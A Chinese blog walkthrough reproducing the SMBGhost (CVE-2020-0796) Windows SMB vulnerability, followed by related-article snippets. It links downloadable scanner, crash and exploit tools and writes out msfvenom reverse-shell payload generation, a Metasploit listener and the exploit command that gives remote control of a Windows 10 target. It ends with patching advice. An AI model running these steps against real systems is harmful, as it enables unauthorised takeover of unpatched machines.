【SMBghost CVE-2020-0796漏洞复现】

已于 2023-09-19 16:28:25 修改
阅读量714 收藏 3
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 网络安全
于 2023-09-19 16:22:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/133030748
版权

目录

一、漏洞原理

二、复现过程

三、防护

一、漏洞原理

   最近在做内网渗透的时候发现一大批可以利用的win系统资产,其中这些资产中对于445的开放限制不多;对于smb3.1版本的window系统存在可被利用的漏洞,即永恒之黑漏洞。SMBv3.1没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。

声明:工具和教程只能用于合法的授权测试,未经他人许可进行非法攻击测试文章作者概不负责。

二、复现过程

利用条件:

1、smb版本v3.1.1

2、端口445开放

3、防火墙关闭

部署win10:

version1903,镜像下载地址:https://msdn.itellyou.cn/

利用:

1、批量检测工具

工具地址链接:https://pan.baidu.com/s/1_Bffj-G1kA8pSUGH_rCwbQ 提取码:dtso

2、smbghost蓝屏

工具地址:链接:https://pan.baidu.com/s/1JRcqiTt9EJrF1vFJzVkY_w 提取码:fx6f

蓝屏攻击

3、反弹shell利用

工具:毒液+metasploit+python

python脚本链接:https://pan.baidu.com/s/1JRcqiTt9EJrF1vFJzVkY_w 提取码:fx6f

毒液生成payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.112.133 lport=4444 -f py -o exp.py

metasploit设置监听:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp 
set lhost 192.168.112.133
run

exp.py中,将buf全部替换成USER_PAYLOAD , 之后将exploit.py中的USER_PAYLOAD全部替换成exp.py中数据。

  使用python反弹shell:

python exploit.py -ip 192.168.112.134

反弹成功上线:

三、防护

1、升级smb版本补丁,win10 version 1903版本以后修复

2、防火墙开启即可阻断

3、防火墙规则配置禁用445,安装防护设备

SMBGhost漏洞CVE2020-0796)简单分析
bluebloodye的专栏
06-26 2685
0x00 漏洞描述 3 月 10 日:微软发布安全通告 ADV200005,称 SMBv3 协议在处理某些请求的方式中存在代码执行漏洞,并提供了缓解措施。 3 月 12 日:微软正式发布 CVE-2020-0796 安全通告和漏洞修复补丁。 CVE-2020-0796是Windows 10 1903/1909的新SMB3压缩功能中的错误。 SMB协议版本3.1.1引入了一种功能,即客户端或服务器可以发布压缩功能,并有选择地压缩SMB3消息。 使用此功能协商会话后,客户端或服务器可以选择..
cve-2020-0796_SMBGhost:微软SMBv3远程代码执行漏洞分析(CVE20200796
weixin_39754411的博客
11-23 792
漏洞描述3月11日,微软发布了针对115个CVE漏洞的补丁更新,其中最引人关注的是一个针对Smb服务器/客户端的一个内存破坏漏洞CVE编号为CVE-2020-0796,成功利用此漏洞的攻击者可以在目标SMB服务器或SMB客户端上执行任意代码,此漏洞属于严重危害的零接触蠕虫级远程代码执行漏洞,此漏洞也被称为SMBGhost或“Coronablue。3月12日,微软正式发布漏洞通告和相关...
SMBGhost:CVE-2020-0796的扫描仪-SMBv3.1.1 + SMB压缩RCE
04-16
SMBGhost 该存储库包含我的扫描程序脚本,该脚本可让您知道您的服务器是否使用SMBv3.1.1并已启用SMB压缩。 最终,这意味着您很容易受到。 此时已发布安全补丁,请确保进行更新! 它还提供了完整记录的数据包结构,可用于针对SMB协议的进一步调查。 请记住,此扫描程序只会告诉您是否已启用SMBv3.1.1和SMB压缩。 它将修补的系统也标记为易受攻击! 用法 该模块具有广泛的日志记录,并且需要库hexdump ,您可以使用pip3 install --user hexdump 。 如果您不想记录日志,则可以使用logless_scanner.py的脚本。 python3 .\scanner.py 127.0.0.1 445 NetBIOS (4): 000000c0 Header (64): fe534d42400000000000000000001f0000000000000
永恒之黑【CVE-2020-0796漏洞详细复现
最新发布
2301_81807686的博客
10-19 1263
漏洞后来被确认为 CVE-2020-0796,也被称为 “smbghost” 或 “永恒之黑”。该漏洞存在于 srv2.sys 文件中,由于 SMBv3 没有正确处理压缩的数据包,在解压数据包时使用客户端传过来的长度进行解压,却没有检查长度是否合法,最终导致整数溢出。之后记得要将win10的防火墙关闭(我这的win10和kail都是NAT模式)在CVE-2020-0796-PoC目录下打开,查看目录下的文件,通过ls命令。准备一个有漏洞的win10,下载链接。测试漏洞(ip为win10ip)
SMBGhost (CVE-2020-0796): 自动化利用与检测工具
gitblog_00093的博客
06-08 555
SMBGhost (CVE-2020-0796): 自动化利用与检测工具 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 SMBGhost 是一个Python程序,用于自动化利用和检测著名的SMBGhost漏洞CVE-2020-0796)。该漏洞是由于微软的Server Message Block (SMB) 协议存在缺陷,可能导致远程代码执行。这个开源项目由Al...
CVE-2020-0796复现(基于kali实现)
m0_74988425的博客
03-06 3165
本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。然而,在这里使用的是`bind_tcp`,它不需要指定远程主机,因此在这种情况下,这个命令没有实际效果。CVE-2020-0796是指影响微软Windows 10和Windows Server 2019的一个漏洞,通常被称为"SMBGhost"或"CoronaBlue"。2. 网络分段: 将网络分为不同的区域,将不同的系统放置在不同的网络中。
SMBGhost:一个SMB的RCE幽灵漏洞
KHOST的博客
03-16 640
近日,一个SMB协议漏洞CVE-2020-0796再次炸锅安全圈,有趣的是,刚过去的微软星期二补丁日,补丁列表上面居然没有CVE-2020-0796这个漏洞编号,国外安全研究员直接给他起了个名字叫SMBGhost,还有的叫做CoronaBlue,因为是新冠.. 来龙去脉,我来给你捋一捋。 万恶之源来自思科talos的博客,上面发布了关于例行补丁日修复的漏洞的检测规则。 ...
永恒之黑(CVE-2020-0796漏洞复现
weixin_46463776的博客
04-15 1036
永恒之黑漏洞复现
CVE-2020-0796漏洞复现
blue_fantasy的博客
01-10 1135
Text. Text. 网上现在已经有很多复现的文章了,我也做一个学习总结。 0x00 漏洞描述 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包
GoGhost:用于大规模SMBGhost扫描的高性能,轻巧,便携式开源工具
04-13
GoGhost GoGhost是用于大规模SMBGhost扫描的高性能,轻便,便携式开源工具。 安装 您可以下载或 。 另外,GoGhost使用本地Golang库,因此上面的行可以对其进行编译: go build GoGhost.go 使用方式 GoGhost在不到3秒的时间内扫描了25,000个IP地址,NMAP花费了600多个。 -iL [FILE] 通过使用-iL选项,您可以指定文件中包含CIDR的列表文件。 -iR [CIDR] 通过使用-iR选项,您可以指定IP范围。 错误肯定和错误否定 如果Windows修补了KB4551762,GoGhost仍会将其标记为易受攻击。 如果文件中的CIDR列表大于500k IP地址,则可能会将某些漏洞标记为超时。 结果 超时=>封闭端口 不脆弱=>没有压缩 脆弱=> SMB上的LZNT1压缩。 免责声明 该工具经过编码,可以衡量SMB
CVE-2020-0796 漏洞复现
迷风小白
06-05 3405
0x00 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 0x01
CVE-2020-0796 SMBGhost漏洞复现
whh6tl的博客
04-26 2068
CVE-2020-0796 SMBGhost漏洞复现漏洞简介漏洞影响范围利用环境漏洞复现:搭建环境攻击机:安装python3环境靶机:windows10 1903 x64位系统,关闭防火墙查看靶机IP使用攻击机查看靶机IP是否能ping通使用脚本检测漏洞配置攻击poc所需环境漏洞利用搭建好环境后运行poc靶机蓝屏,漏洞利用成功修复建议 漏洞简介 Microsoft Windows和Microso...
smbghost永恒之黑复现
weixin_49891807的博客
07-02 1487
SMB 3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,故也称永恒之黑。 影响范围: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows S
cve-2020-0796_SMBGhost 漏洞 CVE20200796 的PoC 已发布,攻击现身
weixin_39622399的博客
11-30 498
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队美国国土安全网络安全和基础设施安全局(CISA)向Windows用户发出警告信息称,最近发布的SMBGhost漏洞PoC已被滥用于发动攻击活动。SMBGhost 漏洞也被称为 CoronaBlue,编号为 CVE-2020-0796,和 Server Message Block 3.0(SMBv3) 相关,具...
cve-2020-0796_【CVE20200796漏洞复现
weixin_39644139的博客
11-30 755
一、漏洞简介该漏洞是服务器消息块3.1.1(SMBv3)协议中处理压缩消息时,对数据没有经过安全检查,直接使用会引发内存破坏,成功利用针对此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器,若要利用针对客户端的漏洞,未经身份验证的攻击者需要配置恶意SMBv3服务器,并诱使用户连接到该服务器。二、...
SMBGhost_RCE漏洞CVE-2020-0796复现
Rainbow_Melo
06-27 3812
漏洞描述 SMB 3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,故也称永恒之黑。 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Syste..
SMBGhost漏洞CVE-2020-0796)远程代码执行分析
综上,标题“CVE-2020-0796_SMBGhost_RCE_exp.zip”暗示该压缩包内含一个针对2020年发现的,编号为CVE-2020-0796安全漏洞漏洞利用代码(Exploit),它允许远程执行代码并且可能利用了SMBGhost漏洞。 ### 描述...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值